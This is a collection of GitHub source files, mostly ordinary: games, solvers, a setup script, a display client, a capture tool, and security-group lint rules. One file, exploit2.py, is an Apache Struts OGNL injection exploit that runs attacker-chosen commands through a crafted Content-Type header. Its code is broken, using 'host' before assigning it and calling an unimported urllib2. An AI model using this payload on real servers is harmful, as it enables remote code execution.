TinyTag.get(source_file_path).track is not None:\n track_characters = len(str(TinyTag.get(source_file_path).track))\n if (\n os.path.basename(destination_file_path)[:track_characters + 1] == str(TinyTag.get(source_file_path).track) + ' '\n or os.path.basename(destination_file_path)[:track_characters + 2] == '0' + str(TinyTag.get(source_file_path).track) + ' '\n ):\n destination_file_path = os.path.dirname(destination_file_path) + os.path.sep + re.sub('^[0-9]+\\s(\\-\\s)?', '', os.path.basename(destination_file_path))\n except:\n pass\n # Create directory if doesn't exist\n os.makedirs(os.path.dirname(destination_file_path), exist_ok=True)\n if not os.path.exists(destination_file_path):\n # Copy file\n print('Copying to: ', destination_file_path)\n shutil.copy(source_file_path, destination_file_path)\n # Iterate files with a 2.1s pause\n time.sleep(2.1)\n\ndef natural_sort(l): \n convert = lambda text: int(text) if text.isdigit() else text.lower() \n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n return sorted(l, key = alphanum_key)\n \nmain()\n","repo_name":"davidzholland/FAT32Copy","sub_path":"copy_files.py","file_name":"copy_files.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19285947563","text":"import jeu as jeu\nimport numpy as np\nfrom random import choice\nimport copy\nimport random\n\n\nclass Node:\n\n\n def __init__(self,m,p):\n self.move=m\n self.parent=p\n self.win=0\n self.visits=0\n self.children = []\n\n\n def est_feuille(self):\n if len(self.children)==0:\n return True\n return False\n \n def selection(self):\n enfants=self.children\n ind=0\n max=Node(enfants[0],self).uct()\n for i in range(len(enfants)):\n if Node(enfants[i],self).uct()>max:\n ind=i\n max=Node(enfants[i],self).uct\n if Node(enfants[ind],self).est_feuille():\n return enfants[ind]\n return Node(enfants[ind],self).selection()\n\n def expansion(self,etat):\n position=etat[\"pacman\"]\n if not jeu.vie_en_moins(etat):\n for enfant in jeu.coup_possible(etat,position):\n nc=Node(enfant,self)\n self.children.append(nc)\n\n def backprogation(self,resultat):\n self.visits+=1\n self.win+=resultat\n\n def a_parent(self):\n if self.parent == None:\n return False\n return True\n \n def uct(self):\n wi=self.win\n ni=self.visits\n Ni=self.parent.visits\n return (wi/ni + np.sqrt(2)*np.sqrt(np.log(Ni)/ni))\n\n\n\ndef rollout(etat):\n state=copy.deepcopy(etat)\n compteur=0\n while not jeu.vie_en_moins(state) or jeu.victoire(state):\n position=state[\"pacman\"]\n coups=jeu.coup_possible(state,position)\n (i,j)=random.choice(coups)\n k,l=jeu.astar_for_ghost(state)\n jeu.deplace(state,\"pacman\",i,j)\n state[\"f\"]=[k,l]\n jeu.deplace(state,\"f\",k,l)\n jeu.mange_fruit(state)\n compteur+=1\n if jeu.victoire(state) or compteur>=6:\n return 1\n else:\n return 0\n \n \n \n\ndef MCTS1(etat):\n root_node=Node(None,None)\n while not jeu.vie_en_moins(etat):\n n,s=root_node, copy.deepcopy(etat)\n while not n.est_feuille():\n n = n.selection()\n #jouer le coup\n (i,j)=n\n k,l=jeu.astar_for_ghost(s)\n jeu.deplace(s,\"pacman\",i,j)\n s[\"f\"]=[k,l]\n jeu.deplace(s,\"f\",k,l)\n jeu.mange_fruit(s)\n #jouer le coup\n n.expansion(s)\n n = n.selection()\n while not jeu.vie_en_moins(s):\n s = rollout(s)\n resultat= rollout(s)\n while n.a_parent():\n n.updtate(resultat)\n n = n.parent\n return n.parent\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass PacManBoard(Node):\n def find_children(etat):\n position=etat[\"pacman\"]\n if jeu.coup_possible(etat,position)==[]: \n return set()\n return jeu.coup_possible(etat,position)\n\n\n def find_random_child(etat):\n if jeu.coup_possible(etat,position)==[]: \n return None\n position=etat[\"pacman\"]\n i,j=choice(jeu.coup_possible(etat,position))\n return jeu.deplace(etat,\"pacman\",i,j)\n\n\n def reward(etat):\n if jeu.vie_en_moins(etat):\n return 0\n if jeu.victoire(etat):\n return 1\n else:\n return 0\n \n \n\n\n\n\n\n \n\ndef enfants1(node):\n childs=node.children\n for child in childs:\n child.parent=node\n child.depth=node.depth+1\n if node.est_feuille():\n return node\n return node.best_child()\n\ndef uct1(node):\n wi=node.win\n ni=node.depth\n t=len(node.children)\n return (wi/ni + np.sqrt(t/ni))\n\n\ndef selection1(node):\n enfants=node.children\n ind=0\n max=uct(enfants[0])\n for i in range(len(enfants)):\n if uct(enfants[i])>max:\n ind=i\n max=uct(enfants[i])\n if est_feuille(enfants[ind]):\n return enfants[ind]\n return selection(enfants[ind])\n \n\n \n \n \n \n \n \n \n \n \n\n\n\n","repo_name":"iShynGu/TIPE","sub_path":"src2/mcts_pacman.py","file_name":"mcts_pacman.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28652917614","text":"__all__ = [\"SecurityGroupOpenToWorldRule\", \"SecurityGroupIngressOpenToWorld\", \"SecurityGroupMissingEgressRule\"]\n\nfrom pycfmodel.model.resources.security_group import SecurityGroup\nfrom pycfmodel.model.resources.security_group_ingress import SecurityGroupIngress\n\nfrom cfripper.model.enums import RuleGranularity, RuleMode\nfrom cfripper.model.rule import Rule\n\n\nclass SecurityGroupOpenToWorldRule(Rule):\n \"\"\"\n Rule that checks for open security groups\n \"\"\"\n\n GRANULARITY = RuleGranularity.RESOURCE\n REASON = \"Port {} open to the world in security group '{}'\"\n\n def invoke(self, cfmodel):\n for logical_id, resource in cfmodel.Resources.items():\n if isinstance(resource, SecurityGroup) and resource.Properties.SecurityGroupIngress:\n list_security_group_ingress = resource.Properties.SecurityGroupIngress\n if not isinstance(list_security_group_ingress, list):\n list_security_group_ingress = [list_security_group_ingress]\n for ingress in list_security_group_ingress:\n if ingress.ipv4_slash_zero() or ingress.ipv6_slash_zero():\n for port in range(ingress.FromPort, ingress.ToPort + 1):\n if str(port) not in self._config.allowed_world_open_ports:\n self.add_failure(\n type(self).__name__, self.REASON.format(port, logical_id), resource_ids={logical_id}\n )\n\n\nclass SecurityGroupIngressOpenToWorld(SecurityGroupOpenToWorldRule):\n \"\"\"\n Rule that checks for open security groups ingress\n \"\"\"\n\n def invoke(self, cfmodel):\n for logical_id, resource in cfmodel.Resources.items():\n if isinstance(resource, SecurityGroupIngress) and (\n resource.ipv4_slash_zero() or resource.ipv6_slash_zero()\n ):\n for port in range(resource.Properties.FromPort, resource.Properties.ToPort + 1):\n if str(port) not in self._config.allowed_world_open_ports:\n self.add_failure(\n type(self).__name__, self.REASON.format(port, logical_id), resource_ids={logical_id}\n )\n\n\nclass SecurityGroupMissingEgressRule(Rule):\n \"\"\"\n Rule that checks for open security groups egress\n \"\"\"\n\n GRANULARITY = RuleGranularity.RESOURCE\n REASON = (\n \"Missing egress rule in {} means all traffic is allowed outbound. Make this explicit if it is desired \"\n \"configuration\"\n )\n RULE_MODE = RuleMode.MONITOR\n\n def invoke(self, cfmodel):\n for logical_id, resource in cfmodel.Resources.items():\n if isinstance(resource, SecurityGroup) and not resource.Properties.SecurityGroupEgress:\n self.add_failure(type(self).__name__, self.REASON.format(logical_id), resource_ids={logical_id})\n","repo_name":"midisfi/cfripper","sub_path":"cfripper/rules/security_group.py","file_name":"security_group.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"43454744760","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport shlex\nimport pybind11\nimport subprocess\n\nfrom setuptools import Extension, setup\nfrom setuptools.command.test import test as TestCommand\nfrom setuptools.command.build_ext import build_ext\n\n# A CMakeExtension needs a sourcedir instead of a file list.\n# The name must be the _single_ output extension from the CMake build.\n# If you need multiple extensions, see scikit-build.\nclass CMakeExtension(Extension):\n def __init__(self, name, sourcedir=\"\"):\n Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\n\nclass CMakeBuild(build_ext):\n def build_extension(self, ext):\n extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n\n # required for auto-detection of auxiliary \"native\" libs\n if not extdir.endswith(os.path.sep):\n extdir += os.path.sep\n\n cfg = \"Debug\" if self.debug else \"Release\"\n # cfg = \"Debug\"\n\n # Set Python_EXECUTABLE instead if you use PYBIND11_FINDPYTHON\n # EXAMPLE_VERSION_INFO shows you how to pass a value into the C++ code\n # from Python.\n cmake_args = [\n \"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY={}\".format(extdir),\n \"-DPYTHON_EXECUTABLE={}\".format(sys.executable),\n \"-DCMAKE_BUILD_TYPE={}\".format(cfg), # not used on MSVC, but no harm\n \"-DCMAKE_CXX_STANDARD=14\"\n ]\n build_args = []\n\n # Enable required feature set in DDXspecial case for DDX:\n cmake_args += [\"-DPYTHON=ON\", \"-DTESTS=OFF\", \"-DEXAMPLES=OFF\",\n \"-DDDX_LIBRARY=OFF\"]\n\n # Add Pybind11 info\n cmake_args += [f\"-DPYBIND11_DIR={pybind11.get_cmake_dir()}\"]\n\n # Set CMAKE_BUILD_PARALLEL_LEVEL to control the parallel build level\n # across all generators.\n if \"CMAKE_BUILD_PARALLEL_LEVEL\" not in os.environ:\n # self.parallel is a Python 3 only way to set parallel jobs by hand\n # using -j in the build_ext call, not supported by pip or PyPA-build.\n if hasattr(self, \"parallel\") and self.parallel:\n # CMake 3.12+ only.\n build_args += [\"-j{}\".format(self.parallel)]\n\n if not os.path.exists(self.build_temp):\n os.makedirs(self.build_temp)\n\n subprocess.check_call(\n [\"cmake\", ext.sourcedir] + cmake_args, cwd=self.build_temp\n )\n subprocess.check_call(\n [\"cmake\", \"--build\", \".\"] + build_args, cwd=self.build_temp\n )\n\n\nclass PyTest(TestCommand):\n user_options = [\n (\"pytest-args=\", \"a\", \"Arguments to pass to pytest\"),\n ]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = \"\"\n\n def finalize_options(self):\n pass\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n\n errno = pytest.main([\"src\"] + shlex.split(self.pytest_args))\n sys.exit(errno)\n\n\ndef read_readme():\n with open(\"README.md\") as fp:\n return \"\".join([line for line in fp if not line.startswith(\"'\")\n\n# The information here can also be placed in setup.cfg - better separation of\n# logic and declaration, and simpler if you include description/version in a file.\nsetup(\n name=\"pyddx\",\n description=\"ddx continuum solvation library\",\n long_description=read_readme(),\n long_description_content_type=\"text/markdown\",\n version=\"0.6.0\",\n #\n author=\"ddx developers\",\n author_email=\"best@ians.uni-stuttgart.de\",\n license=\"LGPL v3\",\n url=\"https://ddsolvation.github.io/ddX\",\n project_urls={\n \"Source\": \"https://github.com/ddsolvation/ddX\",\n \"Issues\": \"https://github.com/ddsolvation/ddX/issues\",\n },\n #\n ext_modules=[CMakeExtension(\"pyddx\")],\n zip_safe=False,\n platforms=[\"Linux\", \"Mac OS-X\"],\n python_requires=\">=3.8\",\n install_requires=[\"numpy >= 1.14\", \"scipy >= 1.8\"],\n tests_require=[\"pytest\", \"numpy\", \"scipy\"],\n cmdclass={\"build_ext\": CMakeBuild, \"pytest\": PyTest, },\n)\n","repo_name":"ddsolvation/ddX","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"29"} +{"seq_id":"27260885656","text":"from itertools import product\n\nCOL = 90\nROW = 91\n\n# For sample\n# COL = 10\n# ROW = 10\n\nclass Square:\n def __init__(self, state=\".\"):\n self.occupied_neighbours = 0\n self.occupied = state == \"#\"\n self.floor = state == \".\"\n\n def signal(self):\n \"\"\"Tell this square that it has an occupied neighbour\"\"\"\n self.occupied_neighbours += 1\n\n def cycle(self):\n \"\"\"Cycle the square to the next state\"\"\"\n changed = False\n if not self.floor:\n if not self.occupied and self.occupied_neighbours == 0:\n self.occupied = True\n changed = True\n elif self.occupied and self.occupied_neighbours >= 5:\n self.occupied = False\n changed = True\n self.occupied_neighbours = 0\n return changed\n\n def __repr__(self):\n return \"#\" if self.occupied else (\".\" if self.floor else 'L')\n\n\ndef print_space(space):\n row = []\n for i in range(-1,ROW+1):\n row = []\n for j in range(-1,COL+1):\n row.append(space[(i,j)])\n print(''.join(str(s) for s in row))\n\n\n# Read input\nwith open(\"inputs/11\", \"r\") as f:\n data = f.read().split(\"\\n\")\n\n\n# Create initial space\nspace = {}\nfor x, row in enumerate(data):\n for y, state in enumerate(row):\n space[(x,y)] = Square(state)\n\nfor i in range(-1,COL+1):\n space[(-1,i)] = Square()\n space[(ROW,i)] = Square()\nfor i in range(-1,ROW+1):\n space[(i,-1)] = Square()\n space[(i,COL)] = Square()\n\nprint_space(space)\n\nchanged = True\nwhile changed:\n changed = False\n # Iterate over the space sending a signal to each neighbour\n for (x,y), square in space.items():\n if not square.occupied:\n continue\n for xo, yo in product((-1,0,1),(-1,0,1)):\n if xo == 0 and yo == 0:\n continue\n m = 1\n cx = x + (m*xo)\n cy = y + (m*yo)\n los = space[(cx,cy)]\n while los.floor and cx >= 0 and cx < ROW and cy >= 0 and cy < COL:\n m += 1\n cx = x + (m*xo)\n cy = y + (m*yo)\n los = space[(cx,cy)]\n los.signal()\n\n # Cycle the space, activating or deactivating\n for (x,y), square in space.items():\n changed = square.cycle() or changed\n print_space(space)\n\nprint(sum(s.occupied for s in space.values()))\n","repo_name":"alexpersin/AoC2020","sub_path":"2020/11/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6609341483","text":"#!/usr/bin/python\nfrom PIL import Image, ImageDraw, ImageFont, ImageColor\nimport socket\nimport os\nimport RPi.GPIO as GPIO\nfrom time import sleep\nfrom pubnub import Pubnub\nimport credentials\nimport textwrap\nimport urllib\nimport cStringIO\n\nbuttonA = 17\nbuttonB = 22\nbuttonC = 23\nbuttonD = 27\n\nw = 240\nh = 321\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(buttonA, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(buttonB, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(buttonC, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(buttonD, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nfnt = ImageFont.truetype('/usr/share/fonts/truetype/roboto/Roboto-Medium.ttf', 20)\n\ndef display(message, color=(255,255,255)):\n\tcanvas = Image.new('RGBA', (w,h), (0,0,0))\n\td = ImageDraw.Draw(canvas)\n\n\tlines = textwrap.wrap(message, width=22)\n\ty = 0\n\tfor line in lines:\n\t\td.text((10,y), line, font=fnt, fill=color)\n\t\ty = y+22\n\n\tcanvas = canvas.rotate(90)\n\tcanvas.save(\"/tmp/test.png\")\n\tos.system('sudo fbi -T 2 -d /dev/fb1 -noverbose /tmp/test.png')\n\ndef displayImage(url):\n\tfile = cStringIO.StringIO(urllib.urlopen(url).read())\n\timg = Image.open(file)\n\timg = img.rotate(90)\n\timg.save(\"/tmp/test.png\")\n\tos.system('sudo fbi -T 2 -a -d /dev/fb1 -noverbose /tmp/test.png')\n\npubnub = Pubnub(publish_key=credentials.PUBLISH_KEY, subscribe_key=credentials.SUBSCRIBE_KEY)\n\ndef callback(message, channel):\n\tif 'text' in message.keys():\n\t\tdisplay(message['text'])\n\tif 'imageurl' in message.keys():\n\t\tdisplayImage(message['imageurl'])\n \ndef error(message):\n\tdisplay(\"ERROR : \" + str(message), color=(255,0,0))\n \ndef connect(message):\n\tdisplay(\"Connected.\", color=(0,255,0))\n \ndef reconnect(message):\n\tdisplay(\"Reconnected.\", color=(0,255,0))\n\ndef disconnect(message):\n\tdisplay(\"Disconnected.\", color=(255,0,0))\n\ndisplay(\"Connecting...\", color=(255,128,0))\npubnub.subscribe(channels='display', callback=callback, error=callback, connect=connect, reconnect=reconnect, disconnect=disconnect)\n\nwhile True:\n\tif(GPIO.input(buttonD) == False):\n\t\ttry:\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t\ts.connect(('8.8.8.8', 0))\n\t\t\tlocal_ip_address = s.getsockname()[0]\n\t\texcept:\n\t\t\tlocal_ip_address = \"No IP\"\n\t\tdisplay(local_ip_address)\n\t\tsleep(1)\n\tsleep(.1)\n\n","repo_name":"mrichardson23/pitft_pubnub","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40642005602","text":"import key_scripts\r\nimport video_scripts\r\nimport log_scripts\r\nfrom vidgear.gears import WriteGear\r\nimport win32api as wapi\r\nimport os\r\nimport threading\r\nimport time\r\n\r\n\"\"\"\r\n press f11 to start captuing frames\r\n press f11 again to stop captuing\r\n press f10 to delete current capture, and restart immidately\r\n press f9 to stop program immidately\r\n\"\"\"\r\n\r\noutput_params = {\"-vcodec\":\"MPEG\", \"-input_framerate\": 25}\r\ncapture_state = 0\r\ndel_it = 0\r\nstart = len(os.listdir('data'))//2 + 1\r\n\r\n\r\ndef capture():\r\n global capture_state\r\n global del_it\r\n global start\r\n\r\n \r\n # while in not_exit mode\r\n while capture_state != 2:\r\n\r\n out_file = str(start)\r\n # capture mode\r\n if capture_state == 1:\r\n log_scripts.log_msg('capturing : '+out_file)\r\n \r\n out_file = 'data\\\\'+out_file\r\n vid_out = WriteGear(out_file+'.avi',compression_mode=False,\r\n custom_ffmpeg='C:\\Program Files (x86)\\ffmpeg\\bin',**output_params)\r\n txt_out = open(out_file+'.txt', 'w')\r\n\r\n # capture 512 frames, or stop if altered\r\n cnt = 0\r\n while cnt <= 512 and not del_it:\r\n vid_out.write(video_scripts.get_state())\r\n txt_out.write(key_scripts.get_state())\r\n cnt = cnt + 1\r\n \r\n vid_out.close()\r\n txt_out.close()\r\n\r\n # if delete\r\n if del_it:\r\n os.remove(out_file+'.avi')\r\n os.remove(out_file+'.txt')\r\n del_it = 0\r\n capture_state = 0\r\n log_scripts.log_msg('deleting : '+out_file)\r\n log_scripts.log_msg('state : False')\r\n log_scripts.log_msg('Capturing : Stop')\r\n else:\r\n log_scripts.log_msg('saving : '+out_file)\r\n start = start + 1\r\n else:\r\n log_scripts.log_msg('at hold')\r\n time.sleep(2)\r\n log_scripts.log_msg('capture thread exited')\r\n exit()\r\n \r\n \r\n \r\ntry:\r\n \r\n capture_thread = threading.Thread(target=capture)\r\n capture_thread.start()\r\n\r\n f11_state = 0\r\n f10_state = 0\r\n f9_state = 0\r\n while capture_state != 2:\r\n f11 = wapi.GetAsyncKeyState(0x7A)\r\n f10 = wapi.GetAsyncKeyState(0x79)\r\n f9 = wapi.GetAsyncKeyState(0x78)\r\n \r\n if f11 and f11_state == 0:\r\n print('alter')\r\n capture_state = 1 if capture_state == 0 else 0\r\n \r\n if f10 and f10_state == 0:\r\n del_it = 1\r\n \r\n if f9 and f9_state == 0:\r\n capture_state = 2\r\n\r\n f11_state = f11\r\n f10_state = f10\r\n f9_state = f9\r\n\r\n\r\n log_scripts.log_msg('exiting')\r\n capture_thread.join()\r\nexcept KeyboardInterrupt:\r\n exit()\r\n\r\n \r\n","repo_name":"aakash140799/ScreenCapture","sub_path":"capture_scripts.py","file_name":"capture_scripts.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34587044090","text":"# -*- coding: utf-8 -*-\n\n# API REST:\nfrom rest_framework import serializers\n\n# Modelos:\nfrom .models import Mensaje\n\n\n# ----------------- ORDEN DE TRABAJO ----------------- #\nclass MensajeSerializer(serializers.HyperlinkedModelSerializer):\n\n usuario_id = serializers.SerializerMethodField()\n usuario_nombre = serializers.SerializerMethodField()\n usuario_img = serializers.SerializerMethodField()\n\n class Meta:\n model = Mensaje\n fields = (\n 'url',\n 'pk',\n 'usuario_id',\n 'usuario_nombre',\n 'usuario_img',\n 'usuario',\n 'texto',\n 'created_date',\n )\n\n def get_usuario_id(self, obj):\n\n try:\n return obj.usuario.id\n except:\n return \"\"\n\n def get_usuario_nombre(self, obj):\n\n try:\n return obj.usuario.get_full_name()\n except:\n return \"\"\n\n def get_usuario_img(self, obj):\n\n try:\n return obj.usuario.profile.imagen.url\n except:\n return \"\"\n","repo_name":"angiealejo/CoreM","sub_path":"comunicacion/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5008143027","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport requests\nimport sys\n\ndef exploit(cmd):\n ognl_payload = \"~multipart/form-data%{\"\n ognl_payload += \"#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,\"\n ognl_payload += \"@java.lang.Runtime@getRuntime().exec('{}')\".format(cmd)\n ognl_payload += \"}\"\n\n if not \":\" in host:\n host = \"{}:8080\".format(host)\n\n url = \"http://{}/basic-struts/helloWorld.action\".format(host)\n\n headers = {'Content-Type': ognl_payload}\n request = urllib2.Request(url, headers=headers)\n response = urllib2.urlopen(request).read()\n\n\nif len(sys.argv) < 3:\n sys.exit('Usage: %s ' % sys.argv[0])\nelse:\n exploit(sys.argv[1],sys.argv[2])\n","repo_name":"iflanagan/pythonExploits","sub_path":"exploit2.py","file_name":"exploit2.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20096237525","text":"def correct_placement(pairs):\n sorted_pairs = [i[0] for i in sorted(enumerate(pairs), key=lambda x: x[1])]\n advantage_pairs = set()\n only_pairs = set()\n placement = [-1] * len(pairs)\n for j in range(len(sorted_pairs)):\n index = sorted_pairs[j]\n pair = pairs[index]\n for advantage_pair in advantage_pairs:\n if pair[0] > advantage_pair[1][0] and pair[1] > advantage_pair[1][1]:\n placement[index] = advantage_pair[0] + 1\n break\n elif pair[0] == advantage_pair[1][0] and pair[1] == advantage_pair[1][1]:\n placement[index] = placement[advantage_pair[0]]\n break\n if placement[index] < 0 and pair not in only_pairs:\n only_pairs.add(pair)\n advantage_pairs.add((index, pair))\n return placement\n\n\nif __name__ == \"__main__\":\n num_test = int(input())\n for i in range(num_test):\n num_num = int(input())\n pairs = []\n for i in range(num_num):\n pair = tuple(sorted([int(i) for i in input().split()]))\n pairs.append(pair)\n print(\" \".join([str(i) for i in correct_placement(pairs)]))\n","repo_name":"tqa236/codeforces","sub_path":"Round693/correct_placement/correct_placement.py","file_name":"correct_placement.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74104421199","text":"# 给定一个整数数组 nums ���找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和。\n#\n# 示例:\n#\n# 输入: [-2,1,-3,4,-1,2,1,-5,4],\n# 输出: 6\n# 解释: 连续子数组 [4,-1,2,1] 的和最大,为 6。\nclass Solution:\n def maxSubArray(self, nums: [int]):\n # 利用给出的测试例进行简单的分析。\n temp = nums[0]\n max_ = temp\n for i in range(1, len(nums)):\n if temp > 0:\n temp += nums[i]\n max_ = max(max_, temp)\n\n else:\n temp = nums[i]\n max_ = max(max_, temp)\n return max_\n\n def maxSubArray2(self, nums: [int]) -> int:\n tmp = nums[0]\n max_ = tmp\n n = len(nums)\n for i in range(1, n):\n # 当当前序列加上此时的元素的值大于tmp的值,说明最大序列和可能出现在后续序列中,记录此时的最大值\n if tmp + nums[i] > nums[i]:\n max_ = max(max_, tmp + nums[i])\n tmp = tmp + nums[i]\n else:\n # 当tmp(当前和)小于下一个元素时,当前最长序列到此为止。以该元素为起点继续找最大子序列,\n # 并记录此时的最大值\n max_ = max(max_, tmp, tmp + nums[i], nums[i])\n tmp = nums[i]\n return max_\n\n\nif __name__ == '__main__':\n s = Solution()\n arr = [8, -19, 5, -4, 20]\n print(s.maxSubArray(arr))","repo_name":"haidfs/LeetCode","sub_path":"Hot100/最长子序列和.py","file_name":"最长子序列和.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29629188478","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom dataclasses import dataclass\n\nfrom types import SimpleNamespace\nfrom contextlib import contextmanager\n\nimport torch as th\n\nfrom dltk.utils import autocast_cls, grad_scaler\nfrom .events import AbstractEventTarget, Event, EventTarget\n\nif TYPE_CHECKING:\n from typing import Any, Union\n from collections.abc import Callable, Iterable, Iterator\n\n from torch.nn import Module, Parameter\n from torch.nn.utils.clip_grad import clip_grad_norm_, clip_grad_value_\n from torch.optim import Optimizer\n from torch.optim.lr_scheduler import _LRScheduler as LRScheduler\n\n from dltk.types import Kwargs, Factory\n\n LRSchedArgs = tuple[Factory[LRScheduler], Kwargs]\n\n__all__ = [\n \"AbstractEngine\",\n \"Context\",\n \"Every\",\n \"ExexMode\",\n \"LocalEngine\"\n]\n\nclass ExecMode(Enum):\n TRAIN = \"train\"\n DEV = \"dev\"\n EVAL = \"evaluate\"\n\n UNKNOWN = \"\"\n\nclass Context(SimpleNamespace):\n _event_to_count = {\n Event.EPOCH_STARTED: \"epoch\",\n Event.EPOCH_ENDED: \"epoch\",\n Event.ITER_STARTED: \"iter\",\n Event.ITER_ENDED: \"iter\"\n }\n\n def __init__(self, **kwargs: Any):\n super().__init__(**kwargs)\n\n self.epoch_count = 0\n self.iter_count = 0\n self.mode = ExecMode.UNKNOWN\n\n def count_for(self, event: Event) -> int:\n return getattr(self, self._event_to_count[event])\n\nclass AbstractEngine(AbstractEventTarget):\n @property\n @abstractmethod\n def training(self) -> bool:\n raise NotImplementedError\n \n @abstractmethod\n def train(self, training: bool = True):\n raise NotImplementedError\n \n def eval(self):\n self.train(False)\n\nclass LocalEngine(AbstractEngine, EventTarget):\n ctx: Context\n\n def __init__(self, model: Module, device: Union[th.device, str], enable_amp: bool = True):\n super().__init__()\n\n device = th.device(device)\n # Device for current node\n self.device = device\n # Model on given device\n self.model = model.to(device)\n\n # AMP autocast class\n self._autocast_cls = autocast_cls(device)\n # Gradient scaler\n self._scaler = grad_scaler(device, enabled=enable_amp)\n # Optimizers\n self._optimizers: dict[str, Optimizer] = {}\n # Learning rate schedulers\n self._lr_scheds: dict[str, list[LRScheduler]] = {}\n\n # Optimizers with gradients unscaled\n self._unscaled_optims: set[str] = set()\n \n def _params_for_optimizers(self, optim_names: Iterable[str]) -> Iterator[Parameter]:\n optimizers = self._optimizers\n\n # For each selected optimizer ...\n for optim_name in optim_names:\n optimizer = optimizers[optim_name]\n # Yield each parameter in all parameter groups\n for param_group in optimizer.param_groups:\n for param in param_group[\"params\"]:\n yield param\n\n @property\n def enable_amp(self) -> bool:\n return self._scaler.is_enabled()\n\n @property\n def training(self) -> bool:\n return self.model.training\n\n def train(self, training: bool = True):\n self.model.train(training)\n\n def state_dict(self) -> dict[str, Any]:\n return {\n \"model\": self.model.state_dict(),\n \"scaler\": self._scaler.state_dict(),\n \"optimizers\": {\n optim_name: optimizer.state_dict() \\\n for optim_name, optimizer in self._optimizers.items()\n },\n \"lr_scheds\": {\n optim_name: [lr_sched.state_dict() for lr_sched in lr_scheds] \\\n for optim_name, lr_scheds in self._lr_scheds.items()\n }\n }\n \n def load_state_dict(self, state: dict[str, Any]):\n optimizers = self._optimizers\n lr_scheds = self._lr_scheds\n\n # Load state for the model\n self.model.load_state_dict(state[\"model\"])\n # Load state for gradient scaler\n self._scaler.load_state_dict(state[\"scaler\"])\n # Load state for optimizers\n for optim_name, optim_state in state[\"optimizers\"]:\n optimizers[optim_name].load_state_dict(optim_state)\n # Load state for learning rate schedulers\n for optim_name, lr_sched_states in state[\"lr_scheds\"]:\n for lr_sched, lr_sched_state in zip(lr_scheds[optim_name], lr_sched_states):\n lr_sched.load_state_dict(lr_sched_state)\n\n def create_optimizer(self, name: str, optim_factory: Callable[..., Optimizer],\n params: Union[Iterable[Parameter], Iterable[Kwargs]], optim_kwargs: Kwargs = {},\n lr_sched_args: Iterable[LRSchedArgs] = ()):\n # Create optimizer\n self._optimizers[name] = optimizer = optim_factory(params, **optim_kwargs)\n # Create LR schedulers\n self._lr_scheds[name] = [factory(optimizer, **kwargs) for factory, kwargs in lr_sched_args]\n\n @contextmanager\n def forward_ctx(self) -> Iterator[None]:\n # Enable gradient computation for training and AMP\n with th.set_grad_enabled(self.training), self._autocast_cls(self.enable_amp):\n yield\n\n def backward(self, *losses: th.Tensor, retain_graph: bool = False, create_graph: bool = False):\n scaler = self._scaler\n\n for loss in losses:\n scaler.scale(loss).backward(retain_graph=retain_graph, create_graph=create_graph)\n\n def unscale_grads(self, *optim_names: str):\n scaler = self._scaler\n optimizers = self._optimizers\n unscaled_optims = self._unscaled_optims\n\n optim_names = optim_names or optimizers.keys()\n # Unscale given (or all) optimizers\n for optim_name in optim_names:\n if optim_name in unscaled_optims:\n continue\n \n scaler.unscale_(optimizers[optim_name])\n # Mark optimized as unscaled\n unscaled_optims.add(optim_name)\n \n def clip_grad_by_norm(self, max_norm: float, *optim_names: str, norm_type: float = 2.):\n self.unscale_grads(*optim_names)\n\n params = self._params_for_optimizers(optim_names) if optim_names \\\n else self.model.parameters()\n # Clip gradients by norm\n clip_grad_norm_(params, max_norm, norm_type)\n\n def clip_grad_by_value(self, clip_value: float, *optim_names: str):\n 